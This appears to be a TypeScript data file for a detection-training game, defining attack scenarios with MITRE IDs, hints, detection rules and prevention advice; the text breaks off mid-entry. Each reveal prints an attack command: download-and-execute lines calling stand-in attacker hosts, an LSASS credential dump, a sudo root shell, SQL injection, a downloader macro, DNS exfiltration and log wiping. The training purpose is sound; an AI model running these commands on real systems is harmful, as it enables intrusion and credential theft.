export interface ScenarioReveal {
  name: string;
  category: string;
  mitreTechniques: string[];
  description: string;
  sourceCode: string;
  codeLanguage: string;
  codeExplanation: { line: number; code: string; explanation: string }[];
  whyItWorks: string;
  howToDetect: string;
  whatYouShouldHaveSeen: string;
  howToPrevent: string;
  realWorldExamples: string[];
  recommendedReading: { title: string; url: string }[];
}

export interface ScenarioDef {
  id: string;
  name: string;
  category: string;
  difficulty: "beginner" | "intermediate" | "advanced" | "expert";
  description: string;
  backstory: string;
  mitreTechniques: string[];
  platforms: string[];
  atomicTestId: string | null;
  tags: string[];
  hints: string[];
  timeLimitMinutes: number;
  reveal: ScenarioReveal;
}

export const SCENARIOS: ScenarioDef[] = [
  {
    id: "recon-nmap-tcp",
    name: "Surface Sweep",
    category: "Reconnaissance",
    difficulty: "beginner",
    description: "A device on the subnet was port-scanned. Identify the technique and source.",
    backstory: "At 02:14 your IDS lit up. Connection attempts to 1,000 TCP ports on 192.168.0.42 in under 4 seconds. Find the actor.",
    mitreTechniques: ["T1046"],
    platforms: ["network"],
    atomicTestId: "T1046-1",
    tags: ["nmap", "scanning", "network"],
    hints: [
      "Look at the SYN-to-ACK ratio in pcap.",
      "1,000 ports in 4 seconds is faster than any human or legitimate service.",
      "Default Nmap scan is a SYN scan (-sS) — half-open.",
    ],
    timeLimitMinutes: 15,
    reveal: {
      name: "Surface Sweep",
      category: "Reconnaissance",
      mitreTechniques: ["T1046 - Network Service Scanning"],
      description: "Classic Nmap SYN scan against the target host's top 1,000 ports.",
      sourceCode: "nmap -sS -T4 --top-ports 1000 192.168.0.42",
      codeLanguage: "bash",
      codeExplanation: [
        { line: 1, code: "nmap -sS -T4 --top-ports 1000 192.168.0.42", explanation: "-sS = TCP SYN (half-open) scan; -T4 = aggressive timing; --top-ports 1000 = the 1k most common ports." },
      ],
      whyItWorks: "Most home networks have no egress monitoring or NIDS, and routers do not rate-limit internal TCP traffic.",
      howToDetect: "Watch for >50 connection attempts to distinct ports from one source in <10s. Suricata rule: alert tcp $HOME_NET any -> $HOME_NET any (msg:\"SCAN nmap SYN\"; flags:S; threshold: type both, track by_src, count 30, seconds 10; sid:1000001;)",
      whatYouShouldHaveSeen: "A burst of TCP SYN packets from one IP with no ACK follow-through, scanning sequential or top-N ports.",
      howToPrevent: "Network segmentation, host-based firewalls (ufw default deny), and Suricata/Zeek on the gateway.",
      realWorldExamples: ["Initial recon phase in almost every red-team engagement", "Mirai botnet propagation"],
      recommendedReading: [
        { title: "Nmap docs", url: "https://nmap.org/book/man-port-scanning-techniques.html" },
        { title: "MITRE T1046", url: "https://attack.mitre.org/techniques/T1046/" },
      ],
    },
  },
  {
    id: "exec-powershell-encoded",
    name: "Wrapped Powder",
    category: "Execution",
    difficulty: "intermediate",
    description: "PowerShell process spawned with base64 args. What did it do?",
    backstory: "Sysmon flagged a powershell.exe child of explorer.exe with a 4KB command line. The string is unreadable. Decode it.",
    mitreTechniques: ["T1059.001", "T1027"],
    platforms: ["windows"],
    atomicTestId: "T1059.001-1",
    tags: ["powershell", "obfuscation", "encoded"],
    hints: [
      "-enc / -EncodedCommand takes UTF-16LE base64.",
      "Use [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('...'))",
      "After decoding, look for IEX, DownloadString, or Invoke-Expression.",
    ],
    timeLimitMinutes: 20,
    reveal: {
      name: "Wrapped Powder",
      category: "Execution / Defense Evasion",
      mitreTechniques: ["T1059.001 - PowerShell", "T1027 - Obfuscated Files"],
      description: "Base64-encoded PowerShell one-liner that pulls and runs a remote payload.",
      sourceCode: "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AHQAYQBjAGsAZQByAC8AcAAuAHAAcwAxACcAKQA=",
      codeLanguage: "powershell",
      codeExplanation: [
        { line: 1, code: "-nop", explanation: "NoProfile — skip user profile init (faster, no logging hooks)." },
        { line: 2, code: "-w hidden", explanation: "WindowStyle Hidden — no visible window." },
        { line: 3, code: "-enc <base64>", explanation: "EncodedCommand. The decoded UTF-16LE is: IEX (New-Object Net.WebClient).DownloadString('http://attacker/p.ps1')" },
      ],
      whyItWorks: "Most endpoint products allow PowerShell by default and the -enc string evades naive command-line keyword detection.",
      howToDetect: "Sysmon Event ID 1 with CommandLine containing '-enc' or '-EncodedCommand'. Decode all such events. Enable Script Block Logging (Event 4104).",
      whatYouShouldHaveSeen: "Process creation: powershell.exe with -enc, parent explorer.exe, followed by outbound HTTP from powershell.exe.",
      howToPrevent: "Constrained Language Mode, AppLocker, AMSI, ScriptBlockLogging, EDR with behavioral detection.",
      realWorldExamples: ["Emotet droppers", "Cobalt Strike default beacon", "QakBot"],
      recommendedReading: [
        { title: "Atomic T1059.001", url: "https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1059.001" },
        { title: "Hunting Encoded PowerShell", url: "https://www.elastic.co/security-labs" },
      ],
    },
  },
  {
    id: "persist-scheduled-task",
    name: "Tick Tock",
    category: "Persistence",
    difficulty: "beginner",
    description: "Something installed a scheduled task last night. What runs at boot?",
    backstory: "A new task appeared in \\Microsoft\\Windows\\<random> at 03:47 last night. The XML references a binary in %APPDATA%\\Roaming.",
    mitreTechniques: ["T1053.005"],
    platforms: ["windows"],
    atomicTestId: "T1053.005-1",
    tags: ["scheduled-task", "persistence", "schtasks"],
    hints: [
      "schtasks /Query /TN '\\Microsoft\\Windows\\<task>' /XML",
      "Look at the trigger — onstart, onlogon, or hourly?",
      "Check Sysmon Event 4698 for task creation.",
    ],
    timeLimitMinutes: 15,
    reveal: {
      name: "Tick Tock",
      category: "Persistence",
      mitreTechniques: ["T1053.005 - Scheduled Task"],
      description: "schtasks created a hidden task that runs a renamed binary at user logon.",
      sourceCode: "schtasks /Create /TN \"Microsoft\\Windows\\UpdateHealth\" /TR \"%APPDATA%\\Roaming\\svchost.exe\" /SC ONLOGON /RL HIGHEST /F",
      codeLanguage: "bash",
      codeExplanation: [
        { line: 1, code: "/TN \"Microsoft\\Windows\\UpdateHealth\"", explanation: "Masquerading inside the Microsoft\\Windows\\ namespace where real tasks live." },
        { line: 2, code: "/TR \"%APPDATA%\\Roaming\\svchost.exe\"", explanation: "User-writable path + masquerading binary name." },
        { line: 3, code: "/SC ONLOGON /RL HIGHEST", explanation: "Trigger every logon, run with highest available privileges." },
      ],
      whyItWorks: "Scheduled tasks survive reboots, run with system or user trust, and admins rarely audit \\Microsoft\\Windows\\*.",
      howToDetect: "Event ID 4698 (security log) — Task Created. Sysmon Event 1 with parent svchost.exe and CommandLine containing schtasks /create. Hunt for binaries in %APPDATA% in scheduled task XML.",
      whatYouShouldHaveSeen: "schtasks.exe execution, then a new file under \\Windows\\System32\\Tasks\\Microsoft\\Windows\\, then registry write under HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule.",
      howToPrevent: "Limit task creation via GPO, enforce signed-binary policies, monitor %APPDATA% writes.",
      realWorldExamples: ["TrickBot", "FIN7", "Cobalt Strike post-ex"],
      recommendedReading: [
        { title: "MITRE T1053.005", url: "https://attack.mitre.org/techniques/T1053/005/" },
      ],
    },
  },
  {
    id: "evasion-lolbas-mshta",
    name: "Trusted Stranger",
    category: "Defense Evasion",
    difficulty: "intermediate",
    description: "A Microsoft-signed binary made an outbound HTTP request and executed script.",
    backstory: "EDR alerted: mshta.exe spawned from an Outlook attachment. Outbound TLS to a Cloudflare IP, then a wscript.exe child.",
    mitreTechniques: ["T1218.005", "T1566.001"],
    platforms: ["windows"],
    atomicTestId: "T1218.005-1",
    tags: ["lolbas", "mshta", "signed-binary"],
    hints: [
      "mshta.exe is a LOLBAS — it can execute remote .hta files.",
      "Look at the command line — does it reference a URL?",
      "LOLBAS bypasses application allow-lists because the binary is signed by Microsoft.",
    ],
    timeLimitMinutes: 20,
    reveal: {
      name: "Trusted Stranger",
      category: "Defense Evasion",
      mitreTechniques: ["T1218.005 - Mshta", "T1566.001 - Spearphishing Attachment"],
      description: "mshta.exe (a signed Microsoft binary) used as a downloader and script host.",
      sourceCode: "mshta.exe https://attacker.example.com/p.hta",
      codeLanguage: "bash",
      codeExplanation: [
        { line: 1, code: "mshta.exe <url>", explanation: "mshta will fetch remote HTML Application and execute embedded VBScript/JScript with no UAC prompt." },
      ],
      whyItWorks: "mshta.exe is Microsoft-signed and allow-listed by most AV / WDAC policies.",
      howToDetect: "Sysmon Event 1: mshta.exe with HTTP/HTTPS URL in command line, or non-standard parent process. Block mshta entirely via WDAC if you have no legitimate need.",
      whatYouShouldHaveSeen: "mshta.exe with URL arg, outbound HTTPS from mshta, child process (wscript/powershell), file writes to temp.",
      howToPrevent: "WDAC rule blocking mshta.exe, disable HTA file association, monitor LOLBAS execution.",
      realWorldExamples: ["APT32 (OceanLotus)", "Kovter", "Cobalt Strike payload delivery"],
      recommendedReading: [
        { title: "LOLBAS mshta", url: "https://lolbas-project.github.io/lolbas/Binaries/Mshta/" },
      ],
    },
  },
  {
    id: "creds-mimikatz-lsass",
    name: "Memory Lane",
    category: "Credential Access",
    difficulty: "advanced",
    description: "lsass.exe was opened by an unknown process with read-memory rights.",
    backstory: "Sysmon Event 10 fired: ProcessAccess on lsass.exe with GrantedAccess 0x1010. Source: a renamed binary in C:\\PerfLogs.",
    mitreTechniques: ["T1003.001"],
    platforms: ["windows"],
    atomicTestId: "T1003.001-1",
    tags: ["mimikatz", "lsass", "credentials"],
    hints: [
      "GrantedAccess 0x1010 = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ.",
      "Only debuggers and credential dumpers need to read lsass memory.",
      "Mimikatz, ProcDump (procdump -ma lsass.exe), comsvcs.dll MiniDump.",
    ],
    timeLimitMinutes: 25,
    reveal: {
      name: "Memory Lane",
      category: "Credential Access",
      mitreTechniques: ["T1003.001 - LSASS Memory"],
      description: "Mimikatz-style LSASS memory dump for credential extraction.",
      sourceCode: "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 624 C:\\PerfLogs\\out.dmp full",
      codeLanguage: "bash",
      codeExplanation: [
        { line: 1, code: "rundll32.exe comsvcs.dll, MiniDump", explanation: "Signed Microsoft DLL exports MiniDump — no Mimikatz binary needed on disk." },
        { line: 2, code: "624", explanation: "PID of lsass.exe." },
        { line: 3, code: "out.dmp full", explanation: "Full memory dump — contains cleartext passwords, NTLM hashes, Kerberos tickets." },
      ],
      whyItWorks: "Local admin can read lsass memory unless Credential Guard / RunAsPPL is enabled.",
      howToDetect: "Sysmon Event 10 (ProcessAccess) where TargetImage=lsass.exe and GrantedAccess in (0x1010, 0x1410, 0x1438, 0x143a, 0x1fffff). Hunt for rundll32 with comsvcs.dll MiniDump in command line.",
      whatYouShouldHaveSeen: "Process access to lsass + .dmp file write + outbound transfer of the dump.",
      howToPrevent: "Enable Credential Guard, RunAsPPL on LSASS, restrict local admin, EDR with memory protection.",
      realWorldExamples: ["Every ransomware operator in 2020+", "APT29", "Volt Typhoon"],
      recommendedReading: [
        { title: "MITRE T1003.001", url: "https://attack.mitre.org/techniques/T1003/001/" },
        { title: "Microsoft Credential Guard", url: "https://learn.microsoft.com/windows/security/identity-protection/credential-guard/" },
      ],
    },
  },
  {
    id: "lateral-psexec",
    name: "Reach Around",
    category: "Lateral Movement",
    difficulty: "intermediate",
    description: "A new service named 'PSEXESVC' started on a workstation across the LAN.",
    backstory: "WORKSTATION-07 logged Event 7045 (service install) for PSEXESVC pointing to C:\\Windows\\PSEXESVC.exe. The originating IP is your domain admin's laptop.",
    mitreTechniques: ["T1021.002", "T1569.002"],
    platforms: ["windows"],
    atomicTestId: "T1021.002-1",
    tags: ["psexec", "smb", "lateral"],
    hints: [
      "PSEXESVC.exe is dropped by Sysinternals PsExec.",
      "Look at Event 7045 (service install) and Event 4624 type 3 (network logon).",
      "Compare to legitimate admin RMM tooling.",
    ],
    timeLimitMinutes: 20,
    reveal: {
      name: "Reach Around",
      category: "Lateral Movement",
      mitreTechniques: ["T1021.002 - SMB/Windows Admin Shares", "T1569.002 - Service Execution"],
      description: "PsExec lateral movement: copies PSEXESVC.exe via ADMIN$ share, installs as service, executes payload.",
      sourceCode: "PsExec.exe \\\\workstation-07 -u DOMAIN\\admin -p '<pwd>' -s -d cmd.exe /c whoami",
      codeLanguage: "bash",
      codeExplanation: [
        { line: 1, code: "\\\\workstation-07", explanation: "UNC target — requires SMB and admin credentials." },
        { line: 2, code: "-s", explanation: "Run as SYSTEM on the remote host." },
        { line: 3, code: "-d", explanation: "Don't wait for process to terminate." },
      ],
      whyItWorks: "Native Windows SMB + service control. Works wherever the user has local admin.",
      howToDetect: "Event 7045 with ServiceName=PSEXESVC; Event 4624 logon type 3 from non-admin source; file write of PSEXESVC.exe to remote ADMIN$.",
      whatYouShouldHaveSeen: "SMB connection on 445, file create of PSEXESVC.exe in C:\\Windows, service install (7045), cmd.exe child of services.exe.",
      howToPrevent: "Disable SMBv1, restrict admin shares, LAPS for unique local admin passwords, network segmentation.",
      realWorldExamples: ["NotPetya", "Ryuk", "Conti"],
      recommendedReading: [
        { title: "MITRE T1021.002", url: "https://attack.mitre.org/techniques/T1021/002/" },
      ],
    },
  },
  {
    id: "exfil-dns",
    name: "Whispered Secrets",
    category: "Exfiltration",
    difficulty: "advanced",
    description: "Unusual DNS volume to a single domain — 380 queries in 2 minutes.",
    backstory: "Pi-hole logs show 380 TXT queries to *.bad.example.com in 120 seconds. Subdomains are 60-char hex strings.",
    mitreTechniques: ["T1048.003", "T1071.004"],
    platforms: ["network", "any"],
    atomicTestId: "T1048.003-1",
    tags: ["dns", "exfiltration", "covert-channel"],
    hints: [
      "DNS is allowed almost everywhere — perfect covert channel.",
      "TXT records can carry larger responses than A/AAAA.",
      "Long hex/base32 subdomains = encoded data chunks.",
    ],
    timeLimitMinutes: 25,
    reveal: {
      name: "Whispered Secrets",
      category: "Exfiltration",
      mitreTechniques: ["T1048.003 - Exfil Over Unencrypted Non-C2", "T1071.004 - DNS"],
      description: "DNS tunneling exfiltration — chunked base32 data encoded as subdomain labels.",
      sourceCode: "# attacker side: dnscat2 server\n./dnscat2 bad.example.com\n\n# victim side:\n./dnscat --dns server=bad.example.com,port=53 --secret=...",
      codeLanguage: "bash",
      codeExplanation: [
        { line: 1, code: "dnscat2 bad.example.com", explanation: "Attacker runs auth NS for bad.example.com — every subdomain query becomes a covert message." },
        { line: 4, code: "victim dnscat", explanation: "Victim chunks data, base32 encodes, sends as <chunk>.bad.example.com TXT queries." },
      ],
      whyItWorks: "Egress firewalls almost never block UDP/53. DNS resolvers happily forward unusual subdomains.",
      howToDetect: "Pi-hole / Suricata: alert on >100 queries to a single domain in 60s; query name entropy > 4.0; subdomain length > 30. Suricata: dns query length stats per domain.",
      whatYouShouldHaveSeen: "High-frequency DNS queries to one domain with high-entropy subdomain labels, often TXT or NULL records.",
      howToPrevent: "Egress DNS only via internal resolver, log + analyze DNS, block known DNS tunneling C2 domains, alert on subdomain entropy.",
      realWorldExamples: ["DNSMessenger (FIN7)", "OilRig", "Cobalt Strike DNS beacon"],
      recommendedReading: [
        { title: "MITRE T1071.004", url: "https://attack.mitre.org/techniques/T1071/004/" },
      ],
    },
  },
  {
    id: "linux-privesc-sudo",
    name: "Wildcard Wound",
    category: "Privilege Escalation",
    difficulty: "intermediate",
    description: "A user with limited sudo rights got root. Find the abused entry.",
    backstory: "/var/log/auth.log shows 'sudo: opuser : TTY=pts/0 ; PWD=/home/opuser ; USER=root ; COMMAND=/usr/bin/find / -name *.log -exec /bin/sh ; ;'",
    mitreTechniques: ["T1548.003"],
    platforms: ["linux"],
    atomicTestId: "T1548.003-1",
    tags: ["gtfobins", "sudo", "privesc"],
    hints: [
      "Check `sudo -l` output.",
      "GTFOBins lists abusable binaries.",
      "find supports -exec — what runs the command?",
    ],
    timeLimitMinutes: 15,
    reveal: {
      name: "Wildcard Wound",
      category: "Privilege Escalation",
      mitreTechniques: ["T1548.003 - Sudo and Sudo Caching"],
      description: "Misconfigured sudoers allowing /usr/bin/find — abused via -exec to spawn root shell.",
      sourceCode: "sudo find . -exec /bin/sh \\; -quit",
      codeLanguage: "bash",
      codeExplanation: [
        { line: 1, code: "sudo find ...", explanation: "find runs as root because sudoers allows it." },
        { line: 2, code: "-exec /bin/sh \\;", explanation: "find's -exec spawns /bin/sh as the parent (root) UID." },
        { line: 3, code: "-quit", explanation: "Exit after first match so the shell doesn't spawn 1000 times." },
      ],
      whyItWorks: "Many binaries (find, vim, less, awk, perl, nmap) have shell-spawning features that inherit the sudo'd UID.",
      howToDetect: "auditd rule on execve where parent=find/vim/less/awk and uid=0 but ruid!=0. Or: log all sudo invocations and review.",
      whatYouShouldHaveSeen: "execve of /bin/sh with parent /usr/bin/find, uid=0 ruid=opuser.",
      howToPrevent: "Audit sudoers regularly. Use NOPASSWD: sparingly. Prefer per-binary least privilege. See GTFOBins for every binary you allow.",
      realWorldExamples: ["CTF stalwart", "Real-world cloud workload escalations"],
      recommendedReading: [
        { title: "GTFOBins find", url: "https://gtfobins.github.io/gtfobins/find/" },
      ],
    },
  },
  {
    id: "web-sqli-union",
    name: "Inside Voice",
    category: "Initial Access",
    difficulty: "intermediate",
    description: "Web app logs show a UNION SELECT in a search parameter.",
    backstory: "nginx access log: GET /search?q=test'%20UNION%20SELECT%20username,password%20FROM%20users--+ 200",
    mitreTechniques: ["T1190"],
    platforms: ["web"],
    atomicTestId: null,
    tags: ["sqli", "owasp", "web"],
    hints: [
      "URL-decoded payload reveals the SQL.",
      "UNION SELECT requires matching column count.",
      "A 200 response means the query worked — credentials leaked.",
    ],
    timeLimitMinutes: 15,
    reveal: {
      name: "Inside Voice",
      category: "Initial Access",
      mitreTechniques: ["T1190 - Exploit Public-Facing Application"],
      description: "Classic UNION-based SQL injection extracting credentials.",
      sourceCode: "GET /search?q=test' UNION SELECT username,password FROM users-- HTTP/1.1",
      codeLanguage: "http",
      codeExplanation: [
        { line: 1, code: "q=test'", explanation: "Single quote breaks out of the string literal in the original query." },
        { line: 2, code: "UNION SELECT username,password FROM users", explanation: "Appends a second SELECT, returning user credentials in the response." },
        { line: 3, code: "--", explanation: "SQL comment — neutralizes the rest of the original query." },
      ],
      whyItWorks: "App concatenates user input into SQL without parameterization.",
      howToDetect: "WAF rules (CRS 942100+), nginx log greps for UNION/SELECT/--/0x in query strings, app-level anomalous response size.",
      whatYouShouldHaveSeen: "HTTP request containing SQL keywords in user-controlled parameter, 200 with unusually long body.",
      howToPrevent: "Parameterized queries / ORMs, strict input validation, WAF, least-privilege DB user.",
      realWorldExamples: ["Heartland Payment Systems (2008)", "TalkTalk (2015)", "Equifax (CVE-2017-5638)"],
      recommendedReading: [
        { title: "OWASP SQLi", url: "https://owasp.org/www-community/attacks/SQL_Injection" },
      ],
    },
  },
  {
    id: "phishing-macro",
    name: "Dear Customer",
    category: "Initial Access",
    difficulty: "beginner",
    description: "An invoice.docm was opened. Word spawned a powershell child.",
    backstory: "User opened 'INVOICE_DUE_FINAL.docm'. Sysmon shows winword.exe -> powershell.exe -> svchost.exe (renamed).",
    mitreTechniques: ["T1566.001", "T1204.002", "T1059.001"],
    platforms: ["windows"],
    atomicTestId: null,
    tags: ["phishing", "macro", "office"],
    hints: [
      "Office macro AutoOpen / Document_Open runs on file open.",
      "Look at Document VBA project.",
      "Process tree: winword -> powershell is almost always malicious.",
    ],
    timeLimitMinutes: 15,
    reveal: {
      name: "Dear Customer",
      category: "Initial Access",
      mitreTechniques: ["T1566.001 - Spearphishing Attachment", "T1204.002 - Malicious File", "T1059.001 - PowerShell"],
      description: "Phishing email with weaponized .docm. VBA AutoOpen launches PowerShell downloader.",
      sourceCode: "Sub AutoOpen()\n    Dim cmd As String\n    cmd = \"powershell -nop -w hidden -c \"\"IEX(New-Object Net.WebClient).DownloadString('http://attacker/p.ps1')\"\"\"\n    Shell cmd, vbHide\nEnd Sub",
      codeLanguage: "vb",
      codeExplanation: [
        { line: 1, code: "AutoOpen()", explanation: "Special VBA name — runs the moment macros are enabled." },
        { line: 4, code: "Shell cmd, vbHide", explanation: "Spawns powershell hidden; the powershell then beacons to the attacker." },
      ],
      whyItWorks: "Users click 'Enable Content' under social pressure. Word -> child process is allowed by default.",
      howToDetect: "Sysmon Event 1: parent winword.exe AND child in (powershell, cmd, wscript, mshta, regsvr32, rundll32). ASR rule 'Block Office from creating child processes'.",
      whatYouShouldHaveSeen: "Email attachment open, winword spawns powershell, outbound HTTP from powershell, payload write to disk.",
      howToPrevent: "Disable macros from internet sources, ASR rules, email gateway sandboxing, user training.",
      realWorldExamples: ["Emotet", "QakBot", "Trickbot", "Dridex"],
      recommendedReading: [
        { title: "Microsoft ASR", url: "https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction" },
      ],
    },
  },
  {
    id: "evasion-clearlog",
    name: "Erased Evening",
    category: "Defense Evasion",
    difficulty: "beginner",
    description: "Windows Security log was cleared at 23:01.",
    backstory: "EventID 1102 appeared in Security log. The user account is your build server's service account.",
    mitreTechniques: ["T1070.001"],
    platforms: ["windows"],
    atomicTestId: "T1070.001-1",
    tags: ["log-cleared", "anti-forensics"],
    hints: [
      "EventID 1102 = audit log cleared (rare and loud).",
      "Look at PreviousLogonId on the 1102 event for the actor.",
      "wevtutil cl Security — the typical command line.",
    ],
    timeLimitMinutes: 10,
    reveal: {
      name: "Erased Evening",
      category: "Defense Evasion",
      mitreTechniques: ["T1070.001 - Clear Windows Event Logs"],
      description: "Attacker cleared the Security event log after credential theft to delay investigation.",
      sourceCode: "wevtutil cl Security",
      codeLanguage: "bash",
      codeExplanation: [
        { line: 1, code: "wevtutil cl Security", explanation: "Wipes the entire Security log. Generates exactly one event (1102) before clearing." },
      ],
      whyItWorks: "Local admin can clear logs unless they're shipped off-host in real time.",
      howToDetect: "Event 1102 (Security cleared), Event 104 (System cleared). Ship logs to SIEM / syslog so on-host clear is irrelevant.",
      whatYouShouldHaveSeen: "1102 event, preceded by suspicious activity that the attacker wanted to hide.",
      howToPrevent: "Forward events to a remote SIEM in real time. Restrict who can clear logs (Manage Auditing user right).",
      realWorldExamples: ["Almost every targeted intrusion"],
      recommendedReading: [
        { title: "MITRE T1070.001", url: "https://attack.mitre.org/techniques/T1070/001/" },
      ],
    },
  },
  {
    id: "persist-registry-run",
    name: "Morning Run",
    category: "Persistence",
    difficulty: "beginner",
    description: "A new value appeared under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.",
    backstory: "Autoruns flagged a new entry 'OneDriveUpdate' pointing at C:\\Users\\<u>\\AppData\\Local\\Temp\\update.exe.",
    mitreTechniques: ["T1547.001"],
    platforms: ["windows"],
    atomicTestId: "T1547.001-1",
    tags: ["registry", "persistence", "run-key"],
    hints: [
      "Run key fires once per logon.",
      "Sysmon Event 13 (RegistryValueSet) under Run.",
      "Masquerading name + Temp path = obvious red flag.",
    ],
    timeLimitMinutes: 10,
    reveal: {
      name: "Morning Run",
      category: "Persistence",
      mitreTechniques: ["T1547.001 - Registry Run Keys"],
      description: "Classic Run key persistence with masquerading name + suspicious path.",
      sourceCode: "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v OneDriveUpdate /d \"%TEMP%\\update.exe\" /f",
      codeLanguage: "bash",
      codeExplanation: [
        { line: 1, code: "reg add HKCU...Run", explanation: "User-writable hive — no elevation needed." },
        { line: 2, code: "OneDriveUpdate", explanation: "Masquerading as Microsoft software." },
        { line: 3, code: "%TEMP%\\update.exe", explanation: "Persistence pointing at a user-writable temp path — abnormal." },
      ],
      whyItWorks: "Run keys are honored without prompt at every logon.",
      howToDetect: "Sysmon Event 13 with TargetObject containing CurrentVersion\\Run; Autoruns review; baseline known-good and alert on diff.",
      whatYouShouldHaveSeen: "reg.exe execution or direct registry API write to Run key with non-program-files target.",
      howToPrevent: "Whitelist autoruns via baseline + alert on diff; EDR autoruns inspection.",
      realWorldExamples: ["80% of commodity malware"],
      recommendedReading: [
        { title: "MITRE T1547.001", url: "https://attack.mitre.org/techniques/T1547/001/" },
      ],
    },
  },
  {
    id: "creds-kerberoast",
    name: "Roast Beast",
    category: "Credential Access",
    difficulty: "advanced",
    description: "A flurry of service-ticket requests from one user account.",
    backstory: "Domain Controller Event 4769 fired 14 times in 30s for various SPNs, all from user opuser, all with encryption type 0x17 (RC4).",
    mitreTechniques: ["T1558.003"],
    platforms: ["windows", "active-directory"],
    atomicTestId: "T1558.003-1",
    tags: ["kerberos", "kerberoast", "ad"],
    hints: [
      "Event 4769 = Kerberos service ticket request.",
      "RC4 (0x17) is the weak encryption type — crackable offline.",
      "Many SPNs in a short window from one user = harvesting.",
    ],
    timeLimitMinutes: 25,
    reveal: {
      name: "Roast Beast",
      category: "Credential Access",
      mitreTechniques: ["T1558.003 - Kerberoasting"],
      description: "Kerberoasting: request RC4 service tickets, crack them offline to recover service-account passwords.",
      sourceCode: "Rubeus.exe kerberoast /outfile:roasted.txt /nowrap\n# then offline:\nhashcat -m 13100 roasted.txt rockyou.txt",
      codeLanguage: "bash",
      codeExplanation: [
        { line: 1, code: "Rubeus kerberoast", explanation: "Enumerates SPNs in the domain, requests an RC4 ticket for each (encrypted with the service account password hash)." },
        { line: 3, code: "hashcat -m 13100", explanation: "Mode 13100 cracks Kerberos 5 TGS-REP etype 23 (RC4-HMAC) offline." },
      ],
      whyItWorks: "Any domain user can request a ticket for any SPN. RC4 was the default until recently. Service account passwords are often weak.",
      howToDetect: "Event 4769 with EncryptionType 0x17, threshold by user > 5 SPNs in 60s. Honeypot service accounts with weak-looking passwords.",
      whatYouShouldHaveSeen: "Many 4769 events from one user account, ticket types RC4, immediate offline cracking.",
      howToPrevent: "Force AES-only tickets, strong service account passwords (>25 chars random), use gMSA, monitor 4769 anomalies.",
      realWorldExamples: ["Almost every AD-targeting ransomware op"],
      recommendedReading: [
        { title: "MITRE T1558.003", url: "https://attack.mitre.org/techniques/T1558/003/" },
        { title: "Sean Metcalf - Kerberoasting", url: "https://adsecurity.org/?p=2293" },
      ],
    },
  },
  {
    id: "linux-cron-persist",
    name: "Hourly Reminder",
    category: "Persistence",
    difficulty: "beginner",
    description: "A new cron job appeared in /etc/cron.hourly/.",
    backstory: "auditd watched /etc/cron.* and flagged a write to /etc/cron.hourly/sysupdate that runs curl | bash.",
    mitreTechniques: ["T1053.003"],
    platforms: ["linux"],
    atomicTestId: "T1053.003-1",
    tags: ["cron", "persistence", "linux"],
    hints: [
      "/etc/cron.hourly runs scripts every hour as root.",
      "auditd -w /etc/cron.hourly -p wa catches writes.",
      "curl | bash is a hallmark of post-exploitation persistence.",
    ],
    timeLimitMinutes: 10,
    reveal: {
      name: "Hourly Reminder",
      category: "Persistence",
      mitreTechniques: ["T1053.003 - Cron"],
      description: "Persistent backdoor via hourly cron job that re-pulls the latest payload.",
      sourceCode: "#!/bin/sh\ncurl -fsSL http://attacker/x.sh | sh",
      codeLanguage: "bash",
      codeExplanation: [
        { line: 1, code: "#!/bin/sh", explanation: "Anything dropped in /etc/cron.hourly/ executes every hour as root." },
        { line: 2, code: "curl ... | sh", explanation: "Always-fresh payload; defeats AV signature scans on disk." },
      ],
      whyItWorks: "/etc/cron.* requires root to write but is rarely audited after initial install.",
      howToDetect: "auditd watch on /etc/cron.*, /var/spool/cron/. Baseline cron contents.",
      whatYouShouldHaveSeen: "File create in /etc/cron.hourly, then hourly outbound curl, then root-spawned shell.",
      howToPrevent: "auditd alerts, IDS on outbound curl-to-sh patterns, file integrity monitoring (AIDE, Tripwire).",
      realWorldExamples: ["XorDDoS", "Mirai", "Kinsing crypto miner"],
      recommendedReading: [
        { title: "MITRE T1053.003", url: "https://attack.mitre.org/techniques/T1053/003/" },
      ],
    },
  },
  {
    id: "command-control-beacon",
    name: "Heartbeat",
    category: "Command and Control",
    difficulty: "advanced",
    description: "Outbound HTTPS to an unusual domain every 60s ± 10s jitter.",
    backstory: "Zeek conn.log shows a host beaconing to https://cdn-update.example.com every ~60s for 6 hours. 256-byte requests, 12-byte responses.",
    mitreTechniques: ["T1071.001", "T1573.002"],
    platforms: ["any"],
    atomicTestId: null,
    tags: ["beacon", "c2", "cobalt-strike"],
    hints: [
      "Periodic small POSTs are textbook C2 beaconing.",
      "Cobalt Strike default 60s + jitter is iconic.",
      "JA3/JA3S TLS fingerprint can identify the framework.",
    ],
    timeLimitMinutes: 25,
    reveal: {
      name: "Heartbeat",
      category: "Command and Control",
      mitreTechniques: ["T1071.001 - Web Protocols", "T1573.002 - Asymmetric Cryptography"],
      description: "Cobalt Strike HTTPS beacon — periodic check-ins with jitter, asymmetric encryption.",
      sourceCode: "# Beacon malleable C2 profile (simplified)\nhttp-get {\n  set uri \"/api/health\";\n  client {\n    header \"User-Agent\" \"Mozilla/5.0 ...\";\n    metadata { base64; prepend \"id=\"; header \"Cookie\"; }\n  }\n  set sleeptime \"60000\";\n  set jitter   \"15\";\n}",
      codeLanguage: "text",
      codeExplanation: [
        { line: 5, code: "set uri \"/api/health\"", explanation: "Masquerade as legitimate API health check." },
        { line: 9, code: "sleeptime 60000", explanation: "60s default beacon interval." },
        { line: 10, code: "jitter 15", explanation: "±15% randomness — defeats naive periodicity detection." },
      ],
      whyItWorks: "Volume-based monitoring misses small periodic POSTs to legit-looking domains over TLS.",
      howToDetect: "Beacon analytics on conn logs: count flows to same dest, compute inter-arrival CV, alert when low. JA3 TLS fingerprint matching known C2.",
      whatYouShouldHaveSeen: "Regular outbound to one domain with constant small payload size and tiny jitter.",
